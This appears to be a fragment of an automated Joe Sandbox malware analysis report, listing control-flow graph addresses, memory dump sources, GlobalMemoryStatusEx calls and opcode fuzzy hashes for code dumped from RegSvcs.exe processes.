                                            • Not Executed
                                            control_flow_graph 353 1065510-1065576 355 10655c0-10655c2 353->355 356 1065578-1065583 353->356 358 10655c4-10655dd 355->358 356->355 357 1065585-1065591 356->357 359 10655b4-10655be 357->359 360 1065593-106559d 357->360 365 10655df-10655eb 358->365 366 1065629-106562b 358->366 359->358 361 10655a1-10655b0 360->361 362 106559f 360->362 361->361 364 10655b2 361->364 362->361 364->359 365->366 367 10655ed-10655f9 365->367 368 106562d-1065685 366->368 369 106561c-1065627 367->369 370 10655fb-1065605 367->370 377 1065687-1065692 368->377 378 10656cf-10656d1 368->378 369->368 372 1065607 370->372 373 1065609-1065618 370->373 372->373 373->373 374 106561a 373->374 374->369 377->378 380 1065694-10656a0 377->380 379 10656d3-10656eb 378->379 386 1065735-1065737 379->386 387 10656ed-10656f8 379->387 381 10656a2-10656ac 380->381 382 10656c3-10656cd 380->382 384 10656b0-10656bf 381->384 385 10656ae 381->385 382->379 384->384 388 10656c1 384->388 385->384 389 1065739-106578a 386->389 387->386 390 10656fa-1065706 387->390 388->382 398 1065790-106579e 389->398 391 1065708-1065712 390->391 392 1065729-1065733 390->392 393 1065716-1065725 391->393 394 1065714 391->394 392->389 393->393 396 1065727 393->396 394->393 396->392 399 10657a7-1065807 398->399 400 10657a0-10657a6 398->400 407 1065817-106581b 399->407 408 1065809-106580d 399->408 400->399 410 106581d-1065821 407->410 411 106582b-106582f 407->411 408->407 409 106580f 408->409 409->407 410->411 412 1065823 410->412 413 1065831-1065835 411->413 414 106583f-1065843 411->414 412->411 413->414 415 1065837-106583a call 1061dd4 413->415 416 1065845-1065849 414->416 417 1065853-1065857 414->417 415->414 416->417 419 106584b-106584e call 1061dd4 416->419 420 1065867-106586b 417->420 421 1065859-106585d 417->421 419->417 423 106586d-1065871 420->423 424 106587b-106587f 420->424 421->420 422 106585f-1065862 call 1061dd4 421->422 422->420 423->424 427 1065873 423->427 428 1065881-1065885 424->428 429 106588f 424->429 427->424 428->429 430 1065887 428->430 431 1065890 429->431 430->429 431->431
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4600636325.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1060000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \Vao
                                            • API String ID: 0-1766136619
                                            • Opcode ID: 287b7d14f65c861f6842d19ae7b8876210634fe32cdffb6e1ad9053d318b76bf
                                            • Instruction ID: 23af6e4e3b9cc02d30f96d3ee4e04cf1f60585c699ea98a2b0a0974f0aadbf51
                                            • Opcode Fuzzy Hash: 287b7d14f65c861f6842d19ae7b8876210634fe32cdffb6e1ad9053d318b76bf
                                            • Instruction Fuzzy Hash: 47B14770E00209CFDB54CFA9DC857EEBBF6BF88354F148129E855AB294EB749841CB81
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4600636325.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1060000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d45b0cf2c66dca2c06d6412b4609087b6c7db8666be7faff4504a2f8b4a5c704
                                            • Instruction ID: 2407b69cd3a5f7d1faec80741610b8ad7d7f3ce8631840540a2e62eef5b0b296
                                            • Opcode Fuzzy Hash: d45b0cf2c66dca2c06d6412b4609087b6c7db8666be7faff4504a2f8b4a5c704
                                            • Instruction Fuzzy Hash: 687250B0B00219DFDB55DFA9C884AAEBBFABF88300F148169E545EB261DB34DD41CB50
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4600636325.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1060000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 349c098f543e3fea0f29c563d873c3cc44a7d8c778d4dbf633470e5e8f6a8eef
                                            • Instruction ID: 0915d9576106b82aa8942c22ccc375b2ec09078fc7c0d22c24c965cd862848ea
                                            • Opcode Fuzzy Hash: 349c098f543e3fea0f29c563d873c3cc44a7d8c778d4dbf633470e5e8f6a8eef
                                            • Instruction Fuzzy Hash: 52824D70A00209DFEB15CF68C684AAEBBFAFF88310F158599E585DB261DB34ED41CB50
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4600636325.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1060000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 34d3040da03ae3020b7ba75aabc63dac9aa308de6430b34cf1b1eb19cf312736
                                            • Instruction ID: ad474c787b2cf70a1660cae91ab4445453b25be802d11452c847111775bcc147
                                            • Opcode Fuzzy Hash: 34d3040da03ae3020b7ba75aabc63dac9aa308de6430b34cf1b1eb19cf312736
                                            • Instruction Fuzzy Hash: B1C18474A04719CBDF584F6A98143ADBEFABFC8701F19C85ED486A628CCF348841DB65
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4600636325.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1060000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 718fdd65a35d0e626d42023018bfaa3760434d03e79501efdfa21049dd1a8450
                                            • Instruction ID: 1475b550da44436e2496ed1bc3915edfe6a62aa427156aca1aa9cd50c4d12b29
                                            • Opcode Fuzzy Hash: 718fdd65a35d0e626d42023018bfaa3760434d03e79501efdfa21049dd1a8450
                                            • Instruction Fuzzy Hash: 98B17B70E00209CFEF54CFA9CC917DEBBF6AF88354F188129E455AB294EB759841CB81

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 340 1067784-1067f34 GlobalMemoryStatusEx 343 1067f36-1067f3c 340->343 344 1067f3d-1067f65 340->344 343->344
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,01067E3A), ref: 01067F27
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4600636325.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1060000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: 5f8ce3536375b0c2fb5a162a367cf0b16fa20ddd493f4ee7ce52bb506bb71bb9
                                            • Instruction ID: e55d46c99c8fcf7ae56e112d5c684c25aeb7055c9e6819778e94d0194fd7504f
                                            • Opcode Fuzzy Hash: 5f8ce3536375b0c2fb5a162a367cf0b16fa20ddd493f4ee7ce52bb506bb71bb9
                                            • Instruction Fuzzy Hash: C61133B1C0465A9BCB10CF9AC444BDEFBF4AF48324F10816AE918B7241D7B8A910CFA1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 347 1067eba-1067efe 348 1067f06-1067f34 GlobalMemoryStatusEx 347->348 349 1067f36-1067f3c 348->349 350 1067f3d-1067f65 348->350 349->350
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,01067E3A), ref: 01067F27
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4600636325.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1060000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: 000b24cf0b728ba4d76d9d84253f3153c46b539e99d47c5a8251f7522de66474
                                            • Instruction ID: 1848942beb5609836ad7e09895761330670247d30e964b461600a271222dc77d
                                            • Opcode Fuzzy Hash: 000b24cf0b728ba4d76d9d84253f3153c46b539e99d47c5a8251f7522de66474
                                            • Instruction Fuzzy Hash: C51103B1C0065ADFDB10CF9AD584BDEFBF4AF48324F14816AE518A7240D7B8A954CFA1
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4600197078.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_cbd000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ea4b6019143ec12abde897e0c50eddaf39f1c9de91dd92f2433bdc265ff1563
                                            • Instruction ID: de9d8f3d89fa3435f333b73ac92708ba8ba447a80b74410bbd1c37036dcb38ba
                                            • Opcode Fuzzy Hash: 0ea4b6019143ec12abde897e0c50eddaf39f1c9de91dd92f2433bdc265ff1563
                                            • Instruction Fuzzy Hash: 34213A72504244DFDF05DF14D9C0F6ABF66FB94324F24816DE90A0B256D336D856CBA2
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4600197078.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_cbd000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                            • Instruction ID: 930e56299d5bf0787e0cf074bc3287ef7929acdc53b2860b9604715a500a04cc
                                            • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                            • Instruction Fuzzy Hash: 7311D376504284CFCF15CF14D9C4B5ABF72FB94324F24C5A9D80A0B256C33AD956CBA2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4600636325.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1060000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \Vao
                                            • API String ID: 0-1766136619
                                            • Opcode ID: 82e64fe92a81a9d238ffb5467f42373b67683a37c35099d20da60c7b683edcf0
                                            • Instruction ID: 7502ca0de4af331e95ad61b25d9cbd3f259177a2ee73dfe74320f7f0953ffe3d
                                            • Opcode Fuzzy Hash: 82e64fe92a81a9d238ffb5467f42373b67683a37c35099d20da60c7b683edcf0
                                            • Instruction Fuzzy Hash: F2919A70E00209DFDF54CFA9CC807EEBBF6AF88754F188169E445AB294EB749845CB81
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4600636325.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1060000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1bb0f48372ba2e2ff16c3025bd7733a04b05f37b3722f81a467e100f1f52d763
                                            • Instruction ID: 72f8aa5f51b189af56362e3de8b52404e5a7358b1129f2a2eef53c24551343ca
                                            • Opcode Fuzzy Hash: 1bb0f48372ba2e2ff16c3025bd7733a04b05f37b3722f81a467e100f1f52d763
                                            • Instruction Fuzzy Hash: C4819035B002198BDB19AF749C5477E7BBBBFC8B10B05C86DE446E7288CE3598429791
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2959498285.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_fc0000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e4dc85db4bb991df1b57596e8895e732366f720091d93f4b38d665161af9c97
                                            • Instruction ID: 978a27910a92911050d0471a1ee335d2b48c5960b65bd21c57b0afa04dd7b118
                                            • Opcode Fuzzy Hash: 1e4dc85db4bb991df1b57596e8895e732366f720091d93f4b38d665161af9c97
                                            • Instruction Fuzzy Hash: 8A616A347012468FDB09AB78E858B6E7BB2FF88710B114569E506DB3A6DF749C028B91
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2959498285.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_fc0000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e244e3f4ccdb45dda1f391b089d5979616055bf341fc018a6052aa910246d4e9
                                            • Instruction ID: 7938097cd7ee70ee2bf7ecfe180b13c0524f81bf23aae2c2e8c23bd4cbaf163a
                                            • Opcode Fuzzy Hash: e244e3f4ccdb45dda1f391b089d5979616055bf341fc018a6052aa910246d4e9
                                            • Instruction Fuzzy Hash: CC414C34601206CFDB09EFB8E89CB6E7FA2FB847107004A2DD406972A9DF749806CB80
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2959498285.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_fc0000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 10fd74ec3788db0ee092784216753e263cbc3ced737f6810e460d12cdc0d4b51
                                            • Instruction ID: 13d511ed8b41c8c6f8201a1b102a3dcda258ea1b477ff915f1c13c8eccfe2c08
                                            • Opcode Fuzzy Hash: 10fd74ec3788db0ee092784216753e263cbc3ced737f6810e460d12cdc0d4b51
                                            • Instruction Fuzzy Hash: 6031EA34B401459FCB14EB78D855BAE7BF2BFC9710F2444A8E106EB3A6CA71DC029B90
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2959498285.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_fc0000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e40e744bf3a4e3bd3fcb0284e9e572928363458d4c0e5486ab06e4138434df55
                                            • Instruction ID: 579b029ab9887eabe93634b53b92e05b2ca1d9286adfbfc6e7d60896f634d01a
                                            • Opcode Fuzzy Hash: e40e744bf3a4e3bd3fcb0284e9e572928363458d4c0e5486ab06e4138434df55
                                            • Instruction Fuzzy Hash: F421A171B002559FDB04EBF9881976FBEEAEFC9310B24842DD50AD7786DE788C0257A1
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2959498285.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_fc0000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c9223ba9fa49579615e2032f6a6fa8786765ea430516921a3dd107b661514ae1
                                            • Instruction ID: 5a448be7ce6bb28a33f89d0fc9c918eb1bee3d09409c9869ba5468af9a81e748
                                            • Opcode Fuzzy Hash: c9223ba9fa49579615e2032f6a6fa8786765ea430516921a3dd107b661514ae1
                                            • Instruction Fuzzy Hash: 38318C34A0024ADFDB0AEBB8D854AAD7FB2FF85304F10456DD001A7296DB75AA46CF50
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2959498285.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_fc0000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a9ea0d2f655cfb17cb8ddd37c38769d4926367f2ef42cc256265d9cfa8f42588
                                            • Instruction ID: 8c0ae9ac6ca80ac832858921128120d54b32c5fc3770df3328d6cd78e8877201
                                            • Opcode Fuzzy Hash: a9ea0d2f655cfb17cb8ddd37c38769d4926367f2ef42cc256265d9cfa8f42588
                                            • Instruction Fuzzy Hash: 80216B78A0020ADFDB09FBB8D854AADBFB6FF84704F104569D105A7355EF74AA42CB50
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2959498285.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_fc0000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52e2edde5415dbbf7c7ef11e3f935e52fd933e1bebbcc16e0499c2278e359e6f
                                            • Instruction ID: 702016c2989f7908778a0bab44af5679b92b27314830ac6046be1dfde5212612
                                            • Opcode Fuzzy Hash: 52e2edde5415dbbf7c7ef11e3f935e52fd933e1bebbcc16e0499c2278e359e6f
                                            • Instruction Fuzzy Hash: CE11A1317007418BDB18BF7DC81962E7EA2FFC4220700493ED1578B691DF749D058B91